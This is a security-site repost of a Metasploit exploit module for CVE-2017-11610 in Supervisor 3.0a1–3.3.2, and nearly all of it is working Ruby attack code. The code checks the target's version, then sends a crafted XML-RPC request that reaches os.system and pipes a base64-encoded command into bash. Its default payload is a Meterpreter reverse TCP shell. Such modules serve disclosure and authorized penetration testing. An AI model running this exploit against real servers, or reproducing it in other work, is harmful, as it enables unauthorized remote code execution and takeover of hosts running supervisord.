首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Supervisor 3.0a1 - 3.3.2 - XML-RPC Authenticated Remote Code Execution (Metasplo
来源:metasploit.com 作者:Hutton 发布时间:2017-09-26  

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##


class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Supervisor XML-RPC Authenticated Remote Code Execution",
      'Description'    => %q{
        This module exploits a vulnerability in the Supervisor process control software, where an authenticated client
        can send a malicious XML-RPC request to supervisord that will run arbitrary shell commands on the server.
        The commands will be run as the same user as supervisord. Depending on how supervisord has been configured, this
        may be root. This vulnerability can only be exploited by an authenticated client, or if supervisord has been
        configured to run an HTTP server without authentication. This vulnerability affects versions 3.0a1 to 3.3.2.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Calum Hutton <c.e.hutton@gmx.com>'
        ],
      'References'     =>
        [
          ['URL', 'https://github.com/Supervisor/supervisor/issues/964'],
          ['URL', 'https://www.debian.org/security/2017/dsa-3942'],
          ['URL', 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11610'],
          ['URL', 'https://github.com/phith0n/vulhub/tree/master/supervisor/CVE-2017-11610'],
          ['CVE', '2017-11610']
        ],
      'Platform'       => 'linux',
      'Targets'        =>
        [
          ['3.0a1-3.3.2', {}]
        ],
      'Arch'           => [ ARCH_X86, ARCH_X64 ],
      'DefaultOptions' =>
        {
          'RPORT'         => 9001,
          'Payload'       => 'linux/x64/meterpreter/reverse_tcp',
        },
      'Privileged'     => false,
      'DisclosureDate' => 'Jul 19 2017',
      'DefaultTarget'  => 0
    ))

    register_options(
      [
        Opt::RPORT(9001),
        OptString.new('HttpUsername', [false, 'Username for HTTP basic auth']),
        OptString.new('HttpPassword', [false, 'Password for HTTP basic auth']),
        OptString.new('TARGETURI', [true, 'The path to the XML-RPC endpoint', '/RPC2']),
      ]
    )
  end

  def check_version(version)
    if version <= Gem::Version.new('3.3.2') and version >= Gem::Version.new('3.0a1')
      return true
    else
      return false
    end
  end

  def check

    print_status('Extracting version from web interface..')

    params = {
      'method'    => 'GET',
      'uri'       => normalize_uri('/')
    }
    if !datastore['HttpUsername'].to_s.empty? and !datastore['HttpPassword'].to_s.empty?
      print_status("Using basic auth (#{datastore['HttpUsername']}:#{datastore['HttpPassword']})")
      params.merge!({'authorization' => basic_auth(datastore['HttpUsername'], datastore['HttpPassword'])})
    end
    res = send_request_cgi(params)

    if res
      if res.code == 200
        match = res.body.match(/<span>(\d+\.[\dab]\.\d+)<\/span>/)
        if match
          version = Gem::Version.new(match[1])
          if check_version(version)
            print_good("Vulnerable version found: #{version}")
            return Exploit::CheckCode::Appears
          else
            print_bad("Version #{version} is not vulnerable")
            return Exploit::CheckCode::Safe
          end
        else
          print_bad('Could not extract version number from web interface')
          return Exploit::CheckCode::Unknown
        end
      elsif res.code == 401
        print_bad("Authentication failed: #{res.code} response")
        return Exploit::CheckCode::Safe
      else
        print_bad("Unexpected HTTP code: #{res.code} response")
        return Exploit::CheckCode::Unknown
      end
    else
      print_bad('Error connecting to web interface')
      return Exploit::CheckCode::Unknown
    end

  end

  def execute_command(cmd, opts = {})

    # XML-RPC payload template, use nohup and & to detach and background the process so it doesnt hangup the web server
    # Credit to the following urls for the os.system() payload
    # https://github.com/phith0n/vulhub/tree/master/supervisor/CVE-2017-11610
    # https://www.leavesongs.com/PENETRATION/supervisord-RCE-CVE-2017-11610.html
    xml_payload = %{<?xml version="1.0"?>
<methodCall>
  <methodName>supervisor.supervisord.options.warnings.linecache.os.system</methodName>
  <params>
    <param>
      <string>echo -n #{Rex::Text.encode_base64(cmd)}|base64 -d|nohup bash > /dev/null 2>&1 &</string>
    </param>
  </params>
</methodCall>}

    # Send the XML-RPC payload via POST to the specified endpoint
    endpoint_path = target_uri.path
    print_status("Sending XML-RPC payload via POST to #{peer}#{datastore['TARGETURI']}")

    params = {
      'method'        => 'POST',
      'uri'           => normalize_uri(endpoint_path),
      'ctype'         => 'text/xml',
      'headers'       => {'Accept' => 'text/xml'},
      'data'          => xml_payload,
      'encode_params' => false
    }
    if !datastore['HttpUsername'].to_s.empty? and !datastore['HttpPassword'].to_s.empty?
      print_status("Using basic auth (#{datastore['HttpUsername']}:#{datastore['HttpPassword']})")
      params.merge!({'authorization' => basic_auth(datastore['HttpUsername'], datastore['HttpPassword'])})
    end
    return send_request_cgi(params, timeout=5)

  end

  def exploit

    res = execute_cmdstager(:linemax => 800)

    if res
      if res.code == 401
        fail_with(Failure::NoAccess, "Authentication failed: #{res.code} response")
      elsif res.code == 404
        fail_with(Failure::NotFound, "Invalid XML-RPC endpoint: #{res.code} response")
      else
        fail_with(Failure::UnexpectedReply, "Unexpected HTTP code: #{res.code} response")
      end
    else
      print_good('Request returned without status code, usually indicates success. Passing to handler..')
      handler
    end

  end

end


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Disk Pulse Enterprise 10.0.12
·Oracle 9i XDB 9.2.0.1 - HTTP P
·CyberLink LabelPrint < 2.5 - B
·FLIR Systems FLIR Thermal Came
·Cash Back Comparison Script 1.
·FLIR Systems FLIR Thermal Came
·DenyAll WAF < 6.3.0 - Remote C
·NodeJS Debugger Command Inject
·Stock Photo Selling 1.0 - SQL
·Fibaro Home Center 2 - Remote
·Microsoft Edge Chakra - 'Javas
·Oracle WebLogic Server 10.3.6.
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved